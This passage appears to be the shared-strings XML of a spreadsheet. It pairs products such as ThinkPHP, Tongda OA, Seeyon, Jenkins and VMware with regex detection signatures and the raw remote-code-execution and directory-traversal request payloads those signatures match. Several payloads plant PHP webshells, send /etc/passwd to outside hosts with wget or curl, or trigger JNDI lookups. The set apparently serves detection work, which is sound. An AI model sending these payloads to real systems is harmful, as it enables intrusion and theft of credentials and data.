    <t>/view/vpn/autovpn/online_check.php?peernode=|`echo%20PD9waHAgZWNobyBtZDUoJzk5OTk5OTk5OScpO3VubGluayhfX0ZJTEVfXyk7Pz4=|base64%20-d%20&gt;%20{{filename}}.php`</t>
  </si>
  <si>
    <t>深信服 Edr</t>
  </si>
  <si>
    <t>深信服 Edr_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/tool/log/c\.php\?strip_slashes=printf\&amp;host=nl\+c\.php).*</t>
  </si>
  <si>
    <t>/tool/log/c.php?strip_slashes=printf&amp;host=nl+c.php</t>
  </si>
  <si>
    <t>Sunflower Simple And Personal</t>
  </si>
  <si>
    <t>Sunflower Simple And Personal_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/check\?cmd=ping\.\./\.\./\.\./windows/system32/windowspowershell/v1\.0/powershell\.exe\+ipconfig).*</t>
  </si>
  <si>
    <t>/check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig|/CGI-bin/rpc</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?g=g\&amp;m=Door\&amp;a=index\&amp;content=&lt;\?php%20echo%20md5\('ThinkCMF'\);).*</t>
  </si>
  <si>
    <t>/index.php?g=g&amp;m=Door&amp;a=index&amp;content=&lt;?php%20echo%20md5('ThinkCMF');</t>
  </si>
  <si>
    <t>Thinkphp_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=index/think\\app/invokefunction\&amp;function=call_user_func_array\&amp;vars\[0\]=print_r\&amp;vars\[1\]\[\]=\{\{verify\}\}).*</t>
  </si>
  <si>
    <t>/index.php?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=print_r&amp;vars[1][]={{verify}}</t>
  </si>
  <si>
    <t>ThinkPHP_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/\?\+config\-create\+/\&amp;lang=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./usr/local/lib/php/pearcmd\&amp;/safedog\(\)\+\{\{rand_base\(10\)\}\}\.log|/\?lang=\.\./\.\./\.\./\.\./\.\./usr/local/php/pearcmd).*</t>
  </si>
  <si>
    <t>/?+config-create+/&amp;lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&amp;/safedog()+{{rand_base(10)}}.log|/?lang=../../../../../usr/local/php/pearcmd</t>
  </si>
  <si>
    <t>.*?(?:/shell\.php\?cmd=phpinfo\(\);</t>
  </si>
  <si>
    <t>/shell.php?cmd=phpinfo();|/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&amp;+config-create+/&lt;?=@eval($_REQUEST['cmd']);?&gt;+/var/www/html/shell.php</t>
  </si>
  <si>
    <t>通达OA_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/general/appbuilder/web/portal/gateway/getdata\?activeTab=%E5%27%19,1%3D%3Eeval\(base64_decode\(%22\{\{base64\(payload\)\}\}%22\)\)\)%3B/\*\&amp;id=19\&amp;module=Carouselimage).*</t>
  </si>
  <si>
    <t>.*?(?:/general/appbuilder/web/portal/gateway/dologin\?name\[\]=%E9%8C%A6%27\.print_r\(md5\(123\)\),//).*</t>
  </si>
  <si>
    <t>/general/appbuilder/web/portal/gateway/dologin?name[]=%E9%8C%A6%27.print_r(md5(123)),//</t>
  </si>
  <si>
    <t>Topsec Topacm</t>
  </si>
  <si>
    <t>Topsec Topacm_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/view/IPV6/naborTable/static_convert\.php\?blocks\[0\]=|%20echo%20%27\{\{randstr\}\}%27%20%3E%20/var/www/html/config_application\.txt%0a).*</t>
  </si>
  <si>
    <t>/view/IPV6/naborTable/static_convert.php?blocks[0]=|%20echo%20%27{{randstr}}%27%20%3E%20/var/www/html/config_application.txt%0a</t>
  </si>
  <si>
    <t>Vmware_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/dr/authentication/oauth2/oauth2login\?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D\.\{\{interactsh\-url\}\}%7D|/dr/authentication/oauth2/oauth2login\?error=\$%7Bjndi%3Aldap%3A%2F%2F\$%7B%3A\-\{\{rand1\}\}%7D\$%7B%3A\-\{\{rand2\}\}%7D\.\$%7BhostName%7D\.uri\.\{\{interactsh\-url\}\}%7D).*</t>
  </si>
  <si>
    <t>/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D|/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D</t>
  </si>
  <si>
    <t>Wifisky</t>
  </si>
  <si>
    <t>Wifisky_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/notice/confirm\.php\?t=%3bping\+\-c\+3\+\{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>致远OA_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/seeyon/test123456\.jsp\?pwd=asasd3344\&amp;\{\{randstr\}\}=ipconfig).*</t>
  </si>
  <si>
    <t>/seeyon/test123456.jsp?pwd=asasd3344&amp;{{randstr}}=ipconfig|/seeyon/htmlofficeservlet</t>
  </si>
  <si>
    <t>华域reporter组件</t>
  </si>
  <si>
    <t>华域reporter组件_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/view/Behavior/toQuery\.php\?method=getList\&amp;objClass=%0aecho%20%27f029ff010012ms%27%20&gt;/var/www/reporter/view/Behavior/f029ff010012ms\.txt%0a</t>
  </si>
  <si>
    <t>/view/Behavior/toQuery.php?method=getList&amp;objClass=%0aecho%20%27f029ff010012ms%27%20&gt;/var/www/reporter/view/Behavior/f029ff010012ms.txt%0a|/view/Behavior/f029ff010012ms.txt</t>
  </si>
  <si>
    <t>迅睿CMS</t>
  </si>
  <si>
    <t>迅睿CMS_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=api\&amp;c=api\&amp;m=template\&amp;app=admin\&amp;name=api_related\.html\&amp;phpcmf_dir=admin\&amp;mid=%20action=function%20name=phpinfo%20param0=\-1).*</t>
  </si>
  <si>
    <t>/index.php?s=api&amp;c=api&amp;m=template&amp;app=admin&amp;name=api_related.html&amp;phpcmf_dir=admin&amp;mid=%20action=function%20name=phpinfo%20param0=-1</t>
  </si>
  <si>
    <t>.*?(?:/\?redirect:\$\{%23a%3d\(new%20java\.lang\.ProcessBuilder\(new%20java\.lang\.String\[\]\{'command'\}\)\)\.start\(\),%23b%3d%23a\.getInputStream\(\),%23c%3dnew%20java\.io\.InputStreamReader\(%23b\),%23d%3dnew%20java\.io\.BufferedReader\(%23c\),%23t%3d%23d\.readLine\(\),%23u%3d"http://\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.apachestruts\.\{\{MY\-DOMAIN\}\}/result%3d"\.concat\(%23t\),%23http%3dnew%20java\.net\.URL\(%23u\)\.openConnection\(\),%23http\.setRequestMethod\("GET"\),%23http\.connect\(\),%23http\.getInputStream\(\)\}).*</t>
  </si>
  <si>
    <t>/?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://{{Host}}.{{Port}}.{{Hostname}}.apachestruts.{{MY-DOMAIN}}/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}</t>
  </si>
  <si>
    <t>Apphp</t>
  </si>
  <si>
    <t>Apphp_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?b\);phpinfo\(\);echo\(base64_decode\('T3BlblZBUwo'\)=/).*</t>
  </si>
  <si>
    <t>/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/</t>
  </si>
  <si>
    <t>Esaitong</t>
  </si>
  <si>
    <t>Esaitong_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/solr/flow/dataimport\?command=full\-import\&amp;verbose=false\&amp;clean=false\&amp;commit=false\&amp;debug=true\&amp;core=tika\&amp;name=dataimport\&amp;dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc\(row\)%7B%0A%20var%20bufReader%20%3D%20new%20java\.io\.BufferedReader\(new%20java\.io\.InputStreamReader\(java\.lang\.Runtime\.getRuntime\(\)\.exec\(%22whoami%22\)\.getInputStream\(\)\)\)%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile\(true\)%20%7B%0Avar%20oneline%20%3D%20bufReader\.readLine\(\)%3B%0Aresult\.push\(%20oneline%20\)%3B%0Aif\(!oneline\)%20break%3B%0A%7D%0A%0Arow\.put\(%22title%22%2Cresult\.join\(%22%5Cn%5Cr%22\)\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20).*</t>
  </si>
  <si>
    <t>/solr/flow/dataimport?command=full-import&amp;verbose=false&amp;clean=false&amp;commit=false&amp;debug=true&amp;core=tika&amp;name=dataimport&amp;dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22)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</t>
  </si>
  <si>
    <t>Geutebruck_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?://uapi\-CGI/certmngr\.CGI\?action=createselfcert\&amp;local=anything\&amp;country=AA\&amp;state=%24\(wget%20http://\{\{interactsh\-url\}\}\)\&amp;organization=anything\&amp;organizationunit=anything\&amp;commonname=anything\&amp;days=1\&amp;type=anything).*</t>
  </si>
  <si>
    <t>//uapi-CGI/certmngr.CGI?action=createselfcert&amp;local=anything&amp;country=AA&amp;state=%24(wget%20http://{{interactsh-url}})&amp;organization=anything&amp;organizationunit=anything&amp;commonname=anything&amp;days=1&amp;type=anything</t>
  </si>
  <si>
    <t>.*?(?:/manager/radius/server_ping\.php\?ip=127\.0\.0\.1|cat%20/etc/passwd&gt;\.\./\.\./\{\{randstr\}\}\.txt\&amp;id=1|cat%20/etc/passwd&gt;\.\./\.\./poc\.txt\&amp;id=1</t>
  </si>
  <si>
    <t>/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd&gt;../../{{randstr}}.txt&amp;id=1|cat%20/etc/passwd&gt;../../poc.txt&amp;id=1|/poc.txt</t>
  </si>
  <si>
    <t>Java</t>
  </si>
  <si>
    <t>Java_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/_search\?source=\$\{jndi:ldap://\$\{hostName\}\.\{\{interactsh\-url\}\}/x\}).*</t>
  </si>
  <si>
    <t>/_search?source=${jndi:ldap://${hostName}.{{interactsh-url}}/x}</t>
  </si>
  <si>
    <t>Jenkins_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/securityRealm/user/admin/descriptorByName/org\.jenkinsci\.plugins\.scriptsecurity\.sandbox\.groovy\.SecureGroovyScript/checkScript\?sandbox=true\&amp;value=class%20abcd\{abcd\(\)\{def%20proc=%22cat%20/etc/passwd%20%22\.execute\(\);def%20os=new%20StringBuffer\(\);proc\.waitForProcessOutput\(os,%20System\.err\);throw%20new%20Exception\(os\.toString\(\)\)\}\}).*</t>
  </si>
  <si>
    <t>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&amp;value=class%20abcd{abcd(){def%20proc=%22cat%20/etc/passwd%20%22.execute();def%20os=new%20StringBuffer();proc.waitForProcessOutput(os,%20System.err);throw%20new%20Exception(os.toString())}}</t>
  </si>
  <si>
    <t>jenkins_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>Jinwanwei</t>
  </si>
  <si>
    <t>Jinwanwei_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/GNRemote\.dll\?GNFunction=CallPython\&amp;pyFile=os\&amp;pyFunc=system\&amp;pyArgu=curl\+\{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>/GNRemote.dll?GNFunction=CallPython&amp;pyFile=os&amp;pyFunc=system&amp;pyArgu=curl+{{interactsh-url}}</t>
  </si>
  <si>
    <t>Jolokia_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/jolokia/win%253C%2525%2520Runtime\.getRuntime%2528%2529\.exec%2528new%2520String%255B%255D%2520%257B%2520%2522sh%2522%252C%2520%2522\-c%2522%252C%2520%2522id%253E!/tmp!/id\.out%2522%2520%257D%2529%253B%2520%2525%253Ewin</t>
  </si>
  <si>
    <t>/jolokia/win%253C%2525%2520Runtime.getRuntime%2528%2529.exec%2528new%2520String%255B%255D%2520%257B%2520%2522sh%2522%252C%2520%2522-c%2522%252C%2520%2522id%253E!/tmp!/id.out%2522%2520%257D%2529%253B%2520%2525%253Ewin|/jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/path!/to!/jsp17290.jsp</t>
  </si>
  <si>
    <t>Kingdee</t>
  </si>
  <si>
    <t>Kingdee_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/easportal/tools/appUtil\.jsp\?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java\.net\.Inet4Address%22%2C%22val%22%3A%22\{\{interactsh\-url\}\}%22%7D%7D).*</t>
  </si>
  <si>
    <t>/easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22{{interactsh-url}}%22%7D%7D</t>
  </si>
  <si>
    <t>Mcafee</t>
  </si>
  <si>
    <t>Mcafee_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/stat\.jsp\?cmd=chcp\+437\+%7c\+dir).*</t>
  </si>
  <si>
    <t>/stat.jsp?cmd=chcp+437+%7c+dir</t>
  </si>
  <si>
    <t>Multiple</t>
  </si>
  <si>
    <t>Multiple_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/sslvpn/sslvpn_client\.php\?client=logoImg\&amp;img=\{\{randstr\}\}%20/tmp%20%7C%7C%20echo%20%27%3CEnabled\-\-%3E%3C%3Fphp%20%40eval%28%24_REQUEST%5B%22pass%22%5D%29%3B%20%3F%3E%20%27%20%3E%20/usr/local/webui/webui/images/basic/login/main_logo_helper\.php%20%7C%7C%20ls).*</t>
  </si>
  <si>
    <t>/sslvpn/sslvpn_client.php?client=logoImg&amp;img={{randstr}}%20/tmp%20%7C%7C%20echo%20%27%3CEnabled--%3E%3C%3Fphp%20%40eval%28%24_REQUEST%5B%22pass%22%5D%29%3B%20%3F%3E%20%27%20%3E%20/usr/local/webui/webui/images/basic/login/main_logo_helper.php%20%7C%7C%20ls</t>
  </si>
  <si>
    <t>Nette</t>
  </si>
  <si>
    <t>Nette_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/nette\.micro/\?callback=shell_exec\&amp;cmd=id\&amp;what=\-1).*</t>
  </si>
  <si>
    <t>/index.php/nette.micro/?callback=shell_exec&amp;cmd=id&amp;what=-1</t>
  </si>
  <si>
    <t>Opentsdb</t>
  </si>
  <si>
    <t>Opentsdb_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/q\?start=2000/10/21\-00:00:00\&amp;end=2020/10/25\-15:56:44\&amp;m=sum:sys\.cpu\.nice\&amp;o=\&amp;ylabel=\&amp;xrange=10:10\&amp;yrange=\[33:system\('wget%20\-\-post\-file%20/etc/passwd%20\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.OpenTSDB\.\{\{MY\-DOMAIN\}\}'\)\]\&amp;wxh=1516x644\&amp;style=linespoint\&amp;baba=lala\&amp;grid=t\&amp;json|/q\?start=2016/04/13\-10:21:00\&amp;ignore=2\&amp;m=sum:jmxdata\.cpu\&amp;o=\&amp;yrange=\[0:\]\&amp;key=out%20right%20top\&amp;wxh=1900x770%60curl%20\{\{Host\}\}\.\{\{Port\}\}\.\{\{Hostname\}\}\.OpenTSDB\.\{\{MY\-DOMAIN\}\}%60\&amp;style=linespoint\&amp;png).*</t>
  </si>
  <si>
    <t>/q?start=2000/10/21-00:00:00&amp;end=2020/10/25-15:56:44&amp;m=sum:sys.cpu.nice&amp;o=&amp;ylabel=&amp;xrange=10:10&amp;yrange=[33:system('wget%20--post-file%20/etc/passwd%20{{Host}}.{{Port}}.{{Hostname}}.OpenTSDB.{{MY-DOMAIN}}')]&amp;wxh=1516x644&amp;style=linespoint&amp;baba=lala&amp;grid=t&amp;json|/q?start=2016/04/13-10:21:00&amp;ignore=2&amp;m=sum:jmxdata.cpu&amp;o=&amp;yrange=[0:]&amp;key=out%20right%20top&amp;wxh=1900x770%60curl%20{{Host}}.{{Port}}.{{Hostname}}.OpenTSDB.{{MY-DOMAIN}}%60&amp;style=linespoint&amp;png</t>
  </si>
  <si>
    <t>深信服_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/dphp/php\-CGI\.exe\?%ADd\+allow_url_include%3d1\+%ADd\+auto_prepend_file%3dphp://input).*</t>
  </si>
  <si>
    <t>/dphp/php-CGI.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input</t>
  </si>
  <si>
    <t>海洋CMS_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/comment/api/index\.php\?gid=1\&amp;page=2\&amp;rlist\[\]=\*hex/@eval\(\$_GET\[_\]\)%3B%3F%3E|/data/mysqli_error_trace\.php\?_=printf\(\{\{randstr\}\}\)%3B).*</t>
  </si>
  <si>
    <t>/comment/api/index.php?gid=1&amp;page=2&amp;rlist[]=*hex/@eval($_GET[_])%3B%3F%3E|/data/mysqli_error_trace.php?_=printf({{randstr}})%3B</t>
  </si>
  <si>
    <t>Simple</t>
  </si>
  <si>
    <t>Simple_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/uploads/employees_ids/\{\{endpoint\}\}\?cmd=cat%20/etc/passwd).*</t>
  </si>
  <si>
    <t>/uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd</t>
  </si>
  <si>
    <t>Sunflower</t>
  </si>
  <si>
    <t>Sunflower_远程代码执行</t>
  </si>
  <si>
    <t>Tamronos</t>
  </si>
  <si>
    <t>Tamronos_远程代码执行</t>
  </si>
  <si>
    <t>.*?(?:/api/ping\?count=5\&amp;host=;cat%20/etc/passwd;\&amp;port=80\&amp;source=1\.1\.1\.1\&amp;type=icmp).*</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?a=fetch\&amp;content=%3C\?php\+file_put_contents\(%22poc\.php%22,%22%3C\?php\+echo\+phpinfo\(\)%3B%22\)%3B).*</t>
  </si>
  <si>
    <t>/index.php?a=fetch&amp;content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?s=/index/index/name/\$%7B@phpinfo\(\)%7D).*</t>
  </si>
  <si>
    <t>/index.php?s=/index/index/name/$%7B@phpinfo()%7D</t>
  </si>
  <si>
    <t>.*?(?:/\?s=index/think\\app/invokefunction\&amp;function=call_user_func_array\&amp;vars\[0\]=phpinfo\&amp;vars\[1\]\[\]=1|/index\.php\?s=index/index/index/think_lang/\.\./\.\./extend/pearcmd/pearcmd/index\&amp;cmd=nslookup\ \{\{interactsh\-url\}\}|curl\ \{\{interactsh\-url\}\}).*</t>
  </si>
  <si>
    <t>/?s=index/index/index|?s=index/think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1|/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&amp;cmd=nslookup {{interactsh-url}}|curl {{interactsh-url}}</t>
  </si>
  <si>
    <t>Detector</t>
  </si>
  <si>
    <t>Detector_目录遍历</t>
  </si>
  <si>
    <t>.*?(?:%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|\.\./\.\./\.\./\.\./\.\./etc/passwd|%252e%252e%252f%252e%252e%252f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%c0%ae%c0%ae%c0%afetc/passwd|\.\.;/\.\.;/\.\.;/etc/passwd|\.\.;/\.\.;/etc/passwd|\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./\.\.\./\./etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|%5c\.\./etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|%2e%2e%2fetc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|\.\.\.\.//\.\.\.\.//etc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|\.\.\./\./\.\.\./\./etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|%252e%252e%252fetc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|\.\.\\\.\.\\\.\.\\etc/passwd|/%5C\.\./%5C\.\./etc/passwd|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etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|%5c\.\.%5c\.\.%5c\.\.%5c\.\./etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215etc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|\\etc/passwd|\.\./etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|\.\./\.\./\.\./\.\./etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//\.\.\.\.//etc/passwd|%5c\.\.%5c\.\./etc/passwd|%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\\.\.\.\\\.\\etc/passwd|\.\.;/\.\.;/\.\.;/\.\.;/\.\.;/etc/passwd|/%5C\.\./%5C\.\./%5C\.\./%5C\.\./etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\\.\.\\etc/passwd|\.\.\\/\.\.\\/\.\.\\/\.\.\\/etc/passwd|%c0%ae%c0%ae%c0%afetc/passwd|\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/\.\.\.\.\\/etc/passwd|%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd|%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216etc/passwd|%c0%ae%c0%ae%c0%af%c0%a